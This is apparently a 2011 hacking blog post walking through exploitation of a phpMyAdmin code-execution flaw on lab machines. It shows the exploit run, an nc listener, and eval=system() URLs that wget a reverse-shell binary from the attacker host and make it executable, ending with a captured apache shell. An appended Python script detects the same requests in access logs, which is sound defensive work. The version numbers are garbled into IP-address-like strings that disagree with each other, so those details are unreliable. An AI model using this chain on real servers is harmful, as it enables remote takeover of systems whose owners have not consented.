Friday, 5 August 2011
phpMyAdmin Prior to 22.214.171.124 and 126.96.36.199 Multiple Remote Vulnerabilities
Bugtraq ID: 48563
Class: Input Validation Error
Published: Jul 05 2011 12:00AM
Updated: Jul 26 2011 10:10PM
URL : http://www.securityfocus.com/bid/48563/info
Hello all, this post will be a mix of an old post I already did, which was "Deface using EVAL() function", and phpMyAdmin Prior to 188.8.131.52 and 184.108.40.206.
PhpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities. Successful attacks can compromise the affected application and possibly the underlying computer. So, let's test that. We have two exploits available. With the first one, we will make the eval option available to us to execute remote commands on the target machine.
php exploit1.php http://172.16.1.18/phpmyadmin
You should get something like this:
[*] Contacting server to retrive session cookie and token.
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.
[*] Contacting server to make it save the injected code to a file.
[*] Contacting server to test if the injected code executes.
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!
[+] Use your browser to execute PHP code like this
Great, that means it worked.
Now we apply what I explained before about EVAL().
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this in the attacking server:
nc -l -p 8080 -vvv
Ok, now let's go back to the browser and upload our shell to the server.
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("ls -la /");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("chmod 777 /tmp/airwolf_reverse_shell");
After you have typed this last line, go to the attacking server's shell to see whether the target server connected back to you.
listening on [any] 8080 ...
172.16.1.18: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.1.79] from (UNKNOWN) [172.16.1.18] 53365
uid=48(apache) gid=48(apache) groups=48(apache)
Yep, as you can see, we got our shell on the server.
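The whole chain above leaves a very recognisable trace on the web server: requests to phpMyAdmin's setup directory (config/config.inc.php) carrying an eval= parameter whose value calls a PHP execution function. The script below is an added example written for this post (not part of the original walkthrough, the exploit, or phpMyAdmin itself) that triages Apache combined-format access logs for exactly that pattern. The log lines embedded in it are constructed for the demonstration; the request URLs mirror the ones shown earlier in the post, and the IP addresses are the lab addresses used above, not real hosts.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access log (Apache combined format). The requests to
# config/config.inc.php?eval=... reproduce the shape of the URLs used in the
# walkthrough; everything else is filler traffic. Not taken from a real server.
SAMPLE_LOG = """\
172.16.1.18 - - [05/Aug/2011:10:12:01 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
172.16.1.79 - - [05/Aug/2011:10:13:44 +0000] "POST /phpmyadmin/index.php?token=abc HTTP/1.1" 200 412 "-" "PHP/5.3"
172.16.1.79 - - [05/Aug/2011:10:13:45 +0000] "GET /phpmyadmin/config/config.inc.php?eval=system(%22ls%20-la%20/%22); HTTP/1.1" 200 88 "-" "Mozilla/5.0"
172.16.1.79 - - [05/Aug/2011:10:13:50 +0000] "GET /phpmyadmin/config/config.inc.php?eval=system%28%22wget+-P+%2Ftmp+http%3A%2F%2F172.16.1.79%2Fx%22%29%3B HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Aug/2011:10:14:02 +0000] "GET /phpmyadmin/config/config.inc.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Minimal parser for the leading fields of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# PHP functions that hand a string to the shell or the PHP interpreter.
CODE_EXEC_RE = re.compile(
    r'\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(', re.I
)

# phpMyAdmin's web-based setup lives under config/; a deployed instance
# should not have that directory reachable at all, so any hit is of interest.
SETUP_SUFFIX = '/config/config.inc.php'


def classify(line):
    """Return a finding dict for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    indicators = []
    if parts.path.endswith(SETUP_SUFFIX):
        indicators.append('setup-config-request')
    if 'eval' in parse_qs(parts.query):
        indicators.append('eval-parameter')
    # Decode once so %28 / + encodings cannot hide the function call.
    if CODE_EXEC_RE.search(unquote_plus(parts.query)):
        indicators.append('php-exec-call')
    if not indicators:
        return None
    severity = 'high' if len(indicators) > 1 else 'info'
    return {
        'ip': m.group('ip'),
        'time': m.group('ts'),
        'status': int(m.group('status')),
        'target': m.group('target'),
        'indicators': indicators,
        'severity': severity,
    }


def scan(log_text):
    """Classify every line of a log and return the list of findings."""
    findings = []
    for line in log_text.splitlines():
        f = classify(line)
        if f:
            findings.append(f)
    return findings


def summarize(findings):
    """Count findings per source IP, which makes a burst from one host obvious."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:4} {f['ip']:12} {f['status']} {','.join(f['indicators'])}")
    print(summarize(results))
```

Run it against a real log by replacing SAMPLE_LOG with the file contents. A request that only touches config/config.inc.php is reported as informational, since scanners probe that path constantly; the combination of the setup path, an eval parameter and a PHP execution call in one request is what a successful run of this chain looks like and is reported as high. The same check also gives the simplest mitigation a sanity test: if the config/ directory has been removed from the deployed phpMyAdmin tree, as the project's installation notes ask, these requests return 404 rather than 200.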
Have fun ;)